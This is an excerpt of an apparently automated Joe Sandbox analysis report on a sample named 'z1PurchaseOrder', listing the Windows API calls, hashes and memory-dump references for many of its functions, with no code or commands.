                                        • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                        • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                        • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume
                                        • String ID: HH
                                        • API String ID: 2507767853-2761332787
                                        • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                        • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                        • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                        • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                        • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                        • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                        • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                        APIs
                                          • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                        • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                        • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                        • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                        • String ID: HH
                                        • API String ID: 1515696956-2761332787
                                        • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                        • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                        • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                        • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                        APIs
                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                        • GetMenuItemInfoW.USER32 ref: 004497EA
                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                        • DrawMenuBar.USER32 ref: 00449828
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Menu$InfoItem$Draw_malloc
                                        • String ID: 0
                                        • API String ID: 772068139-4108050209
                                        • Opcode ID: aba2b2f37e8aede0e07af882035f7c7ba327ed0a8d43e4983355c33413849c0f
                                        • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                        • Opcode Fuzzy Hash: aba2b2f37e8aede0e07af882035f7c7ba327ed0a8d43e4983355c33413849c0f
                                        • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AllocTask_wcslen
                                        • String ID: hkG
                                        • API String ID: 2651040394-3610518997
                                        • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                        • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                        • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                        • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                        • API String ID: 2574300362-1816364905
                                        • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                        • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                        • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                        • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                        APIs
                                        • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                        • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: ICMP.DLL$IcmpSendEcho
                                        • API String ID: 2574300362-58917771
                                        • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                        • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                        • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                        • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                        APIs
                                        • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                        • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: ICMP.DLL$IcmpCloseHandle
                                        • API String ID: 2574300362-3530519716
                                        • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                        • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                        • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                        • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                        APIs
                                        • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                        • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: ICMP.DLL$IcmpCreateFile
                                        • API String ID: 2574300362-275556492
                                        • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                        • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                        • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                        • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: IsWow64Process$kernel32.dll
                                        • API String ID: 2574300362-3024904723
                                        • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                        • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                                        • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                        • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: c8a8680659340ce3ae7b61d15611f915275d61821cdaab737acf418eefb31e18
                                        • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                        • Opcode Fuzzy Hash: c8a8680659340ce3ae7b61d15611f915275d61821cdaab737acf418eefb31e18
                                        • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                        APIs
                                        • __flush.LIBCMT ref: 00414630
                                        • __fileno.LIBCMT ref: 00414650
                                        • __locking.LIBCMT ref: 00414657
                                        • __flsbuf.LIBCMT ref: 00414682
                                          • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                          • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                        • String ID:
                                        • API String ID: 3240763771-0
                                        • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                        • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                        • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                        • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                        • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                        • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                        • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CopyVariant$ErrorLast
                                        • String ID:
                                        • API String ID: 2286883814-0
                                        • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                        • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                        • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                        • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                        APIs
                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                        • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                        • #21.WSOCK32 ref: 004740E0
                                        • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ErrorLast$socket
                                        • String ID:
                                        • API String ID: 1881357543-0
                                        • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                        • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                        • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                        • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                        APIs
                                        • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                        • GetWindowRect.USER32(?,?), ref: 00441D5A
                                        • PtInRect.USER32(?,?,?), ref: 00441D6F
                                        • MessageBeep.USER32(00000000), ref: 00441DF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Rect$BeepClientMessageScreenWindow
                                        • String ID:
                                        • API String ID: 1352109105-0
                                        • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                        • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                        • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                        • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                        • __isleadbyte_l.LIBCMT ref: 004238B2
                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                        • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                        • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                        • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                        APIs
                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                        • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                        • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                        • String ID:
                                        • API String ID: 3321077145-0
                                        • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                        • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                        • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                        • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                        APIs
                                        • GetParent.USER32(?), ref: 004505BF
                                        • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                        • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                        • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
